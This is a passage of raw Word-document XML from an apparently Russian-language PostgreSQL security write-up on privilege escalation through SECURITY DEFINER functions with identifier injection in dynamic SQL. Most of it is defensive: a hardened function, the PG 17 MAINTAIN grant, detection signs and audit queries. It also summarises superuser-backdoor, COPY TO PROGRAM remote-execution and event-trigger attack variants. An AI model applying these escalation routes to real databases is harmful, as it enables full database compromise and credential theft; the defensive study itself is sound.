          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    PERFORM 1 FROM pg_class c</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c.relnamespace = n.oid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE n.nspname = tenant_schema AND c.relname = target_table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      AND c.relkind = 'r';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    IF NOT FOUND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'table %.% does not exist', tenant_schema, target_table;</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-- 4. Identifier через %I, никаких concat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    EXECUTE format('ANALYZE %I.%I', tenant_schema, target_table);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    EXECUTE format('REINDEX TABLE %I.%I', tenant_schema, target_table);</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Защита-уровней четыре:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET search_path = pg_catalog, pg_temp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — закрывает 3.13.6.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Whitelist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через query к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(живой список schemas, не hardcoded array — масштабируется автоматически).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. ASCII-regex для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">target_table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4.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для identifier в EXECUTE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все четыре независимы — single failure не открывает уязвимость.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Альтернатива — переход на PG 17 `pg_maintain` role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В PostgreSQL 17 (релиз 26.09.2024) появилась predefined role </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_maintain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MAINTAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> privilege на таблицу. Это позволяет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">избавиться от SECURITY DEFINER функции вообще</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PG 17+ pattern: явный GRANT MAINTAIN, без SECURITY DEFINER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT MAINTAIN ON ALL TABLES IN SCHEMA tenant_42 TO application_admin;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Теперь application_admin может ANALYZE / REINDEX / VACUUM / CLUSTER напрямую</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снимает целую категорию атак на SECURITY DEFINER функции для maintenance tasks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Для PG ≤ 16 — приходится использовать SECURITY DEFINER + защиту выше.</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Variant A — создание persistent superuser backdoor. Variant B — RCE как ОС-пользователь postgres + exfiltration всех паролей. Variant C — persistent backdoor через event trigger. Все три — full DBA compromise from application-admin-level account.</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внутри EXECUTE plpgsql-функции — DDL (DROP USER, CREATE USER), CREATE EVENT TRIGGER, COPY TO PROGRAM. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Эти statements от caller `application_admin`, но фактически выполнены под postgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это критичный mismatch в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">usename</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> field.</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появление новых ролей (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">attacker SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — direct audit.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pg_event_trigger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: новые triggers, owner = postgres, created от non-DBA session.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all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: full SQL trace; backdoor-statements видны полностью.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OS-logs: подозрительные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">curl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bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-процессы под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-user (Variant B).</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Каскад трёх ошибок</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SECURITY DEFINER переключает current_user на owner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Документация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*"SECURITY DEFINER specifies that the function is to be executed with the privileges of the user that owns it."* Это design-feature для делегирования прав.</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Dynamic SQL EXECUTE внутри SD-функции наследует SECURITY DEFINER context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это документировано в plpgsql section: *"The string is parsed and executed as if it were entered as a SQL statement at the SQL-language level."* Поскольку we в SD-context, statement исполняется под owner.</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Identifier-injection пропускает arbitrary SQL в EXECUTE-string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. См. 3.16.1–3.16.4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сочетание — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">arbitrary SQL под owner-привилегиями</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это не разные баги, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">это один class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — «privilege escalation через mis-coded SD-функцию», и identifier-injection — самый частый способ его триггера.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Минимальный case: SD-функция с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">одним</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-concat identifier — достаточно. Защита требует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">systematic audit всех SD-функций</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Audit-query для всех SD-функций в БД, ищем dynamic SQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT n.nspname, p.proname, p.prosrc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_proc p</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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WHERE p.prosecdef = true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND p.prosrc ~ '\bEXECUTE\b'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND p.prosrc !~ '\bformat\s*\(.*%I'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY n.nspname, p.proname;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Этот query показывает SD-функции с EXECUTE без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format(... %I ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — кандидаты на ручной аудит.</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(SECURITY DEFINER — с очень ранних).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EXECUTE на уязвимую SD-функцию. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Superuser не требуется</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это и есть смысл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жертвы (owner функции):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> типично superuser или application-admin. Чем выше privilege owner-а, тем дороже атака.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функция с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EXECUTE ... || ...</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format('%s', ident)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для identifier.</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SECURITY DEFINER + dynamic SQL — стандартный паттерн для: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Audit-trail wrappers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (логирование действий пользователей через защищённую таблицу).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Permission-check functions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check_can_access(user, resource) → bool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> под privileged context).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Tenant management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (admin-only DDL операции на user-specified schemas).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Generic CRUD-wrappers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для multi-tenant приложений.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все эти use cases легитимны </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">при условии правильного использования identifier-защиты + whitelist + SET search_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Pattern из «Защита» выше — canonical.</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(статически):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prosecdef = true AND prosrc ~ '\\bEXECUTE\\b' AND prosrc !~ '\\bformat\\s*\\(.*%I'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — SD-функции с EXECUTE без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prosecdef = true AND prosrc ~ '\\|\\|'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — SD-функции с concat (требуют ручного аудита).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prosecdef = true AND proconfig IS NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
